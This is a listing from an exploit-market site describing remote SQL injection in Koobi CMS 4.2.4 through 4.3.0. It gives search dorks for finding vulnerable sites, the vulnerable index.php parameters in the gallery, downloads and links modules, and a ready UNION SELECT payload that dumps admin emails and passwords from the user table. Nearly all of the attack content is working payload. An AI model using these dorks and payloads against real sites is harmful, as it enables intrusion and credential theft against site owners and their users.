[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2881
Category
web applications
Date add
13-04-2008
Platform
unsorted
=========================================================================
Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities
=========================================================================




[+] Info:

[~] Software: Koobi CMS 4.3.0, 4.2.5, 4.2.4
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS

[+] Dorks:

[~] Koobi CMS 4.3.0: "powered by koobi-cms 4.3.0"
[~] Koobi CMS 4.2.5: "powered by koobi-cms 4.2.5"
[~] Koobi CMS 4.2.4: "powered by koobi-cms 4.2.4"

[+] Exploits for 4.3.0:

[~] Module: gallery
[~] /index.php?area=1&p=gallery&action=showimages&galid=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

[~] Module: downloads
[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

[+] Exploits for 4.2.5:

[~] Module: links
[~] /index.php?showlink=1&fid=1&p=links&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

[~] Module: downloads
[~] /index.php?showfile=1&fid=1&p=downloads&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*

[+] Exploits for 4.2.4:

[~] Module: downloads
[~] /index.php?showfile=1&fid=31&p=downloads&area=1&categ=[SQL]
[~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/*




#  0day.today [2024-11-16]  #